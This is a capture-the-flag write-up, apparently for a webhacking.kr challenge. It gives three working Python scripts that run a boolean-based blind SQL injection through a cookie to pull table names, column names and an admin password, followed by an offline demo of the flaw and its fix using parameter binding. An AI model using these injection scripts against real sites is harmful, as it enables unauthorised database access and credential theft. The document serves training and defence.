A boolean-based blind SQL injection is possible through the `time` value in the cookie, using MySQL's if() expression: the injected condition decides whether the cookie evaluates to 1 (true) or to the original timestamp (false), and the page renders differently in each case.


1. Identify the table names

import requests

url = "https://webhacking.kr/challenge/web-02/"
flag = ""

# Each character is recovered one bit at a time: bin(ascii(ch)) is left-padded
# to 7 bits, and the if() returns 1 (true) or the original timestamp (false).
for i in range(1, 18):
    binary = ''
    for j in range(1, 8):
        cookies = {'time': 'if(1=(select+substr(lpad(bin(ascii(substr(group_concat(table_name),'+str(i)+',1))),7,0),'+str(j)+',1)+from+information_schema.tables+where+table_schema=database()),1,1587445410)'}
        response = requests.get(url, cookies=cookies)

        # True branch: the cookie evaluates to 1 and the page renders a date
        # containing '2070'; otherwise the real timestamp is shown.
        if '2070' in response.text:
            binary += '1'
        else:
            binary += '0'
        print(binary)

    b2i = int(binary, 2)  # parse the 7-bit string as an integer
    # Turn the integer back into a single byte with to_bytes and decode it as a character.
    flag = flag + b2i.to_bytes((b2i.bit_length() + 7) // 8, 'big').decode()
    print("[+] " + flag)

print("[+]Final Flag : " + flag)


Result: admin_area_pw, log



2. Identify the column names

import requests

url = "https://webhacking.kr/challenge/web-02/"
flag = ""

# Same bit-by-bit oracle as before, now reading column names of admin_area_pw.
for i in range(1, 3):
    binary = ''
    for j in range(1, 8):
        cookies = {'time': 'if(1=(select+substr(lpad(bin(ascii(substr(group_concat(column_name),'+str(i)+',1))),7,0),'+str(j)+',1)+from+information_schema.columns+where+table_name="admin_area_pw"),1,1587445410)'}
        response = requests.get(url, cookies=cookies)

        # '2070' in the response marks the true branch (cookie evaluated to 1).
        if '2070' in response.text:
            binary += '1'
        else:
            binary += '0'
        print(binary)

    b2i = int(binary, 2)  # parse the 7-bit string as an integer
    # Turn the integer back into a single byte with to_bytes and decode it as a character.
    flag = flag + b2i.to_bytes((b2i.bit_length() + 7) // 8, 'big').decode()
    print("[+] " + flag)

print("[+]Final Flag : " + flag)


Result: pw


3. Retrieve the pw value

import requests

url = "https://webhacking.kr/challenge/web-02/"
flag = ""

# Same oracle again, this time reading the pw column of admin_area_pw.
for i in range(1, 18):
    binary = ''
    for j in range(1, 8):
        cookies = {'time': 'if(1=(select+substr(lpad(bin(ascii(substr(pw,'+str(i)+',1))),7,0),'+str(j)+',1)+from+admin_area_pw),1,1587445410)'}
        response = requests.get(url, cookies=cookies)

        # '2070' in the response marks the true branch (cookie evaluated to 1).
        if '2070' in response.text:
            binary += '1'
        else:
            binary += '0'
        print(binary)

    b2i = int(binary, 2)  # parse the 7-bit string as an integer
    # Turn the integer back into a single byte with to_bytes and decode it as a character.
    flag = flag + b2i.to_bytes((b2i.bit_length() + 7) // 8, 'big').decode()
    print("[+] " + flag)

print("[+]Final Flag : " + flag)
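The challenge's server-side code is not shown in this writeup, so as an added example (not the challenge's code) here is the shape of the defect the three scripts rely on, next to its fix, run offline against a constructed SQLite database. The table and column names (admin_area_pw, pw, log) are the ones recovered above; the stored password, the log rows and both handler functions are assumptions made for illustration. Because SQLite has no if(), the constructed conditional uses CASE WHEN instead.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema mirroring the names recovered in the writeup."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin_area_pw (pw TEXT)")
    con.execute("INSERT INTO admin_area_pw VALUES ('constructed-secret')")  # made-up value
    con.execute("CREATE TABLE log (id INTEGER PRIMARY KEY, time INTEGER)")
    con.execute("INSERT INTO log (time) VALUES (1587445410)")
    return con


def vulnerable_time(con: sqlite3.Connection, cookie_time: str) -> int:
    """Hypothetical vulnerable handler: the raw cookie string is spliced into SQL text.

    Any expression in the cookie is evaluated by the database, so a conditional
    returns 1 or the original timestamp depending on data the caller should not
    be able to query. That result is what the page then renders.
    """
    return con.execute(f"SELECT {cookie_time}").fetchone()[0]


def hardened_time(con: sqlite3.Connection, cookie_time: str) -> int:
    """Hardened handler: strict integer validation plus parameter binding.

    The cookie must be a plain decimal integer, and the value reaches the
    database as a bound parameter, so it can only ever be compared as data.
    Returns how many log rows carry that timestamp (a stand-in for the real lookup).
    """
    if re.fullmatch(r"[0-9]{1,10}", cookie_time) is None:
        raise ValueError("time cookie must be a decimal integer")
    t = int(cookie_time)
    row = con.execute("SELECT COUNT(*) FROM log WHERE time = ?", (t,)).fetchone()
    return row[0]


# Constructed conditional in the same spirit as the writeup's cookie: it yields 1
# when the first character of pw is 'c' and the original timestamp otherwise.
PROBE = ("CASE WHEN (SELECT substr(pw,1,1) FROM admin_area_pw)='c' "
         "THEN 1 ELSE 1587445410 END")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, plain cookie :", vulnerable_time(db, "1587445410"))
    print("vulnerable, conditional  :", vulnerable_time(db, PROBE))
    print("hardened, plain cookie   :", hardened_time(db, "1587445410"))
    try:
        hardened_time(db, PROBE)
    except ValueError as exc:
        print("hardened, conditional    : rejected ->", exc)
```

With the vulnerable handler the conditional collapses to 1, which is exactly the one-bit oracle the scripts above turn into a full dump; with the hardened handler the same string never reaches the database because it fails validation, and even a value that passes validation is bound as an integer rather than interpreted as SQL.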


rootable